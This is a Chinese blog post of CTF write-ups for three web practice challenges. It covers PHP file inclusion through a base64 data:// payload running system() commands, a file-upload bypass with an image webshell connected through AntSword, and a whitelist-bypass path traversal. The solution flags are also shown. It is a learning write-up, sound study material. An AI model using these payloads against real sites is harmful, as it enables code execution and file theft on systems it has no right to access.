攻防世界部分wp(web引导模式)

于 2024-09-14 20:56:51 发布
阅读量224 收藏 2
点赞数 3
文章标签: 攻防世界 web_php_include upload1 warmup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77001831/article/details/142266213
版权

Web_php_include

打开容器发现就是命令执行,先进行代码审计发现php://伪协议被绕过了,这时想到data://伪协议

http://61.147.171.105:49486/?hello=hhh&page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpPz4=

PD9waHAgc3lzdGVtKCdscycpPz4=为<?php system('ls')?>base64加密过后的字符串

使用命令读取读取fl4gisisish3r3.php的文件的内容,

最后执行data://伪协议即可。(记得查看源代码F12)

http://61.147.171.105:49486/?hello=hhh&page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgLi9mbDRnaXNpc2lzaDNyMy5waHAnKTs/Pg==

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

upload1

打开容器发现就是一个文件上传绕过,先上传一个php文件发现提示请选择一张图片文件上传!

那么先上传一张图片马,然后用bp抓包修改图片马的文件后缀为.php然后,用蚁剑连接。(看清楚文件上传到哪个地方了)

cyberpeace{166b85aed7c39dd6a8d0f6b03d8707a4}

warmup

打开容器查看源代码发现有一个source.php文件,访问一下发现源代码。(并发现了一个hint.php)

代码审计一下,实现了一个文件包含的利用显示了当前文件的利用,其中包含一个静态方法checkFile,用于检查传入的文件名是否在白名单中。接着,代码检查$_REQUEST['file']参数是否存在,并且是否为字符串,然后调用checkFile方法检查文件名是否在白名单中。如果文件名在白名单中,则包含该文件并退出程序;否则,显示一张图片。构造playload即可。

http://61.147.171.105:54397/?file=source.php?../../../../../ffffllllaaaagggg

flag{25e7bce6005c4e0c983fb97297ac6e5a}

M's blog
关注
攻防世界wpweb1)
a34376764的博客
01-08 439
1、view_source web题,打开网页后当然首先打开Web开发者工具,一眼就能看到flag了。 2、robots 还是web题,还是先打开Web开发者工具,这次居然没有flag,查看描述了解此题需要了解robots协议,立马百度,了解到了robots协议的大致内容。 回到题目,根据百度到的内容,在网址后添加" /robots.txt ": 发现flag在一个PHP文件内,构造PHP地址后顺利得到flag。 .
攻防世界WEB进阶——Cat wp
weixin_42499640的博客
07-31 1005
首先打开题目是个发现是个云端测试 提示输入域名 先输个baidu.com 没反应 输入百度的ip 220.181.38.148 反馈了 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transmitted, 0 receive...
攻防世界题目练习——Web引导模式(四)(持续更新)
qq_48550824的博客
11-07 385
以及服务相应的版本…等等,从而可以找到相应的漏洞。不知道这个admin是uname输入框还是passwd输入框变过来的,盲猜应该是uname,重新试一下改了一下passwd,但是发现并没有返回302结果,返回的是200,并且没有像上一个一样的this_is_your_cookie的Set-Cookie的值,猜测可能是因为用户名密码不正确?的讲解,“能够对外发起网络请求的地方,就可能存在 SSRF”,我的理解为:凡是一个输入框可以用来访问其他网站的,就可能存在ssrf漏洞。
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界题目练习——Web引导模式(三)(持续更新)
qq_48550824的博客
10-16 740
它能解析 .git/index 文件,并找到工程中所有的:文件名和文件 sha1,然后去 .git/objects/ 文件夹下下载对应的文件,通过 zlib 解压文件,按原始的目录结构写入源代码。下载完成后,因为看到前面的参考博客里是用的__init__.py文件来下载,于是在我下载的githacker-master的目录下的lib目录中找到了这个文件,按照那篇博客上的命令还是没法下载。/etc/passwd ,但是发现。在博客3讲的拼接不是很详细,没太懂这样构造之后在代码中是怎么拼接的,于是看了博客1.
攻防世界Web引导模式刷题记录及wp(持续更新)
beicheng_yinian的博客
11-06 88
打开F12找到cookie,发现值那一栏给我们提供了一个文件cookie.php,直接访问,告知我们查看http response(查看http响应),在网络那一栏发送请求并查看得到flag。wp:直接访问/robots.txt,发现显示禁止所有搜索引擎访问所有目录以及单独的一个flag目录,那我们直接访问该文件得到flag。wp:首先用get请求:/?a=1,页面转为用post提交b=2(使用HackBar)wp:对网页出现的php代码进行简单的分析。8.simple_php(简单的php
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界RE 流浪者 wp
03-15
攻防世界RE 流浪者 wp
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
python从入门到实践外星人入侵
09-14
python pycharm 外星人
『人事流程图新』公务车辆管理流程图.xlsx
09-14
『人事流程图新』公务车辆管理流程图.xlsx
应届大学生求职通用简历表格
09-14
应届大学生求职通用简历表格
基于Go语言的国密算法库(gmsm).zip
最新发布
09-14
本项目是一个基于Go语言实现的国密SM2/SM3/SM4算法库。它提供了sm2椭圆曲线算法、SM3密码哈希算法以及SM4分组密码算法的实现。该库支持密钥生成、签名验证、加密解密等基础操作,同时提供了与现有标准接口兼容的证书生成、读写以及证书链操作等功能。此外,该项目还提供了详细的使用说明和通信渠道,方便用户交流和获取技术支持。该项目适用于需要对国密算法进行开发和应用的场景,如区块链、金融、信息安全等领域。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看reADME.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
4.html
09-14
4
TestDataPlan-CET.pdf
09-14
TestDataPlan-CET.pdf
专属题库-网络安全管理员二级(技师)实操练习题.pdf
09-14
专属题库-网络安全管理员二级(技师)实操练习题.pdf
2.html
09-14
2
一个类Excel纯JS表格上下滚动显示、在线编辑js类控件
09-14
1.本控件设计封装了一个纯javascript表格显示js类控件,可以直接接口mysql数据库结果集查询,调用只需一行语句。控件具有自定义显示颜色、自定义显示宽高、类似excel上下左右滚动翻页、按字段排序、选择、修改、添加、插入、删除、鼠标调整列宽、双击(按空格键)直接编辑、自动返回编辑json数据,一键导出excel、自适应显示等功能。为力求网页下载简单方便快速,没有加入华丽图片背景(可后期叠加),全调用只有一个文件,js压缩下来只43k。 2.tableshow控件为纯js编写,只有一个tableshow.min.js文件,只需一行调用代码即可。其他js和css为辅助显示用,非tableshow控件调用。 3.为了说明tableshow使用方法和注意事项,用了三个html文件进行示例显示,所有使用方法和注意事项在这三个文件中进行了说明。另外,对tableshow插件的操作使用,点击插件调用显示表格的“操作-帮助”即可显示。
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞执行恶意代码或读取敏感文件。 文件包含漏洞分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。LFI漏洞发生在应用程序尝试包含本地文件时,而RFI漏洞则允许攻击者通过远程服务器包含外部文件。 为了防止文件包含漏洞,开发人员应该遵循以下最佳实践: 1. 永远不要信任用户输入。对用户提供的文件名、路径或URL进行严格的输入验证和过滤。 2. 使用白名单机制限制可包含的文件范围。只允许应用程序包含预定义的合法文件,而不是用户可控制的任意文件。 3. 避免使用动态包含,尽量使用静态包含。如果必须使用动态包含,确保只包含可信任的文件。 4. 对于本地文件包含漏洞,限制访问文件系统的权限。确保应用程序只能访问必要的文件,并将敏感文件放在可访问性受限的目录下。 5. 对于远程文件包含漏洞,禁止从远程服务器包含文件,或者使用安全的方法验证和限制远程文件的来源。 6. 定期更新和修补应用程序的漏洞,以确保及时修复已知的文件包含漏洞和其他安全问题。 这些是一些常见的防范文件包含漏洞的方法,但在实际开发过程中,还需要根据具体情况采取其他安全措施来保护应用程序免受攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值